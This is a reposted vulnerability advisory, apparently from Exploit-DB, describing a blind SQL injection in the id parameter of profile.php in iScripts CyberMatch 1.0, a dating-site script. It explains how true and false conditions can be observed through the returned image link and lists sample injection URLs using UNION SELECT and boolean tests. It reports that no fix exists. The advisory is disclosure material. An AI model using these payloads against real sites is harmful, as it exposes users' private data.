iScripts CyberMatch 1.0 – Blind SQL Injection - 体验盒子

作者： Salvatore Fresta
日期： 2010-07-02
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/14164/
iScripts CyberMatch 1.0 Blind SQL Injection Vulnerability

 NameiScripts CyberMatch
 Vendorhttp://www.iscripts.com
 Versions Affected 1.0

 AuthorSalvatore Fresta aka Drosophila
 Website http://www.salvatorefresta.net
 Contact salvatorefresta [at] gmail [dot] com
 Date2010-02-07

X. INDEX

 I.ABOUT THE APPLICATION
 II. DESCRIPTION
 III.ANALYSIS
 IV. SAMPLE CODE
 V.FIX
 

I. ABOUT THE APPLICATION

iScripts CyberMatch is aturnkeyonline dating software
foryou tostartafull-fledgeddatingsitelike
match.com or eHarmony in minutes. iScripts CyberMatch can
be usedtocreateyourown Dating, Personals or match
making Site, Adult or Matrimonial Site.


II. DESCRIPTION

A parameter is not properly sanitised before being used in
a SQL query.


III. ANALYSIS

Summary:

 A) Blind SQL Injection
 

A) Blind SQL Injection

The id parameter in profile.php is notproperly sanitised
before being used in a SQL query. Thatisnotthe query
which selects the information about theuser specified by
the id parameter but is the query that selects the image's
name. The affected query is a query of five fields.

When the injected condition is true, inthepage will be
printed thereallinkto the personal image of the user
specifiedbytheidparameter,otherwisealinkto
bignophoto.gif.

True condition:
http://site/path/images/profiles/id_random.jpg

False condition:
http://site/path/images/profiles/bignophoto.gif

Successful exploitation requiresthat "magic_quotes_gpc"
is disabled and that the user specified byid parameter
has posted an image.


IV. SAMPLE CODE

A) Blind SQL Injection

http://site/path/profile.php?id=10' UNION SELECT 1,2,3,4,5%23

http://site/path/profile.php?id=10' AND 1=1%23
http://site/path/profile.php?id=10' AND 1=0%23


V. FIX

No Fix.